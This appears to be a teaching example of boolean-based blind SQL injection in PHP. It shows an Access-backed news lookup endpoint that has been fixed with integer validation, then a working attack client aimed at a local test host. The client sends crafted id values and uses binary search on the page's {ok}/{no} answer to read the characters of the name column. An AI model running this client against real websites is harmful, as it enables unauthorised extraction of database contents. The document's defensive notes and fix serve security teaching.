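<?php
// News lookup endpoint (b.php in the client further down): answers "{ok}" when
// a row with the requested id exists in the `news` table and "{no}" otherwise.
//
// Security note: the earlier form of this script built its query as
//     "select * from news where id=" . $_GET[id]
// i.e. the raw request parameter was pasted into the SQL text. Although the
// page never prints database content, the {ok}/{no} answer is a yes/no oracle,
// and that alone is enough for boolean-based (blind) SQL injection.
// The id is therefore validated as an integer before the query is built.

$rawId = isset($_GET['id']) ? $_GET['id'] : null;

// FILTER_VALIDATE_INT yields an int, or false for anything else (missing
// parameter, arrays, text with trailing SQL, ...).
$id = filter_var($rawId, FILTER_VALIDATE_INT);
if ($id === false) {
    // Same answer as for a missing row, so malformed input gives the caller
    // no extra signal (no error text, no distinct response).
    echo "{no}";
    exit;
}

$conn = new com("ADODB.Connection");
$connstr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("data.mdb");
$conn->Open($connstr);

$rs = new com("ADODB.RecordSet");
// $id is a PHP integer here, so the concatenation cannot add SQL syntax.
$sql = "select * from news where id=" . $id;
// 1, 1 = adOpenKeyset cursor, adLockReadOnly lock.
$rs->Open($sql, $conn, 1, 1);

if (!$rs->eof) {
    echo "{ok}";
} else {
    echo "{no}";
}

// Release the COM objects explicitly instead of relying on script shutdown.
$rs->Close();
$conn->Close();
?>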
把 id 参数直接拼接进 SQL 语句的写法存在注入。但是页面没有输出查询结果,只能判断记录是否存在(返回 {ok} 或 {no}),也就是布尔型盲注。
<?php

// Client side of the demonstration: it sends one request per comparison to
// b.php and reads the {ok}/{no} answer.

// 7 == E_ERROR | E_WARNING | E_PARSE, so notices are not reported.
error_reporting(E_ERROR | E_WARNING | E_PARSE);
// 0 removes PHP's execution time limit for this script.
ini_set('max_execution_time', 0);

/**
 * Sends one GET request for /b.php with the global $cmd appended to the id
 * parameter, and reports whether the response contains the "{ok}" marker.
 *
 * Globals read: $host (used for the Host header and as the socket target;
 * the port argument is fixed at 80) and $cmd (query fragment, inserted as-is).
 *
 * Defender's view: every call is a single HTTP request whose numeric-looking
 * id parameter carries SQL keywords and a comparison operator. A burst of such
 * requests against one endpoint is what access logs and WAF telemetry record.
 *
 * @return true|null true when "{ok}" occurs anywhere in the raw response;
 *                   null (no explicit return value) otherwise.
 */
function send()
{
    global $host, $cmd;

    // Request line and headers, CRLF-separated, closed by an empty line.
    $message = implode("\r\n", array(
        "GET /b.php?id=" . $cmd . " HTTP/1.1",
        "Accept: */*",
        "Accept-Language: zh-cn",
        "Content-Type: application/x-www-form-urlencoded",
        "Host: " . $host,
        "Connection: Close",
    )) . "\r\n\r\n";

    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    // Read the whole response (headers and body) until the peer closes.
    $resp = '';
    while ($fp && !feof($fp)) {
        $resp .= fread($fp, 1024);
    }

    preg_match('/\{ok\}/', $resp, $pre);
    if ($pre) {
        return true;
    }
}

/**
 * Binary search for an integer between 32 and 128, using send() as a yes/no
 * oracle.
 *
 * For each midpoint the function stores "$sql=N" in the global $cmd and calls
 * send(); if that is not confirmed it stores "$sql<N" and calls send() again
 * to pick the half to continue in. Progress is echoed after every probe.
 *
 * Defender's view: the 32..128 range is covered in at most seven iterations
 * of up to two requests each, so one recovered value corresponds to a short,
 * regular series of near-identical requests that differ only in the trailing
 * number. That regularity is a usable detection signal.
 *
 * @param string $sql Expression fragment the comparison is appended to.
 * @return int The confirmed value, or -1 when no midpoint was confirmed.
 */
function Binsearch($sql)
{
    global $cmd;

    // Numeric strings: PHP compares and adds them numerically below.
    $low = '32';
    $high = '128';

    while ($low <= $high) {
        $mid = intval(($low + $high) / 2);

        // Equality probe for the midpoint.
        $cmd = $sql . "=" . $mid;
        echo $mid;
        if (send()) {
            echo "Lucky\r\n";
            return $mid;
        }

        // Ordering probe: not confirmed means the value is above the midpoint.
        $cmd = $sql . "<" . $mid;
        if (!send()) {
            $low = $mid + 1;
            echo "Smaller\r\n";
            continue;
        }

        $high = $mid - 1;
        echo "Bigger\r\n";
    }

    return -1;
}

// Local test endpoint and the probed expression. URL-decoded, the fragment is
// "15 and asc(left(name,1))": row id 15 combined with a condition on the
// character code of the first character of the `name` column.
// In request logs this shows up as an id parameter that contains "and",
// function calls and a comparison instead of a bare number. Integer
// validation of id on the server side rejects all of it.
$host = "127.0.0.1:8080";
$sql = "15%20and%20asc(left(name,1))";

$found = Binsearch($sql);
echo $found;
?>
|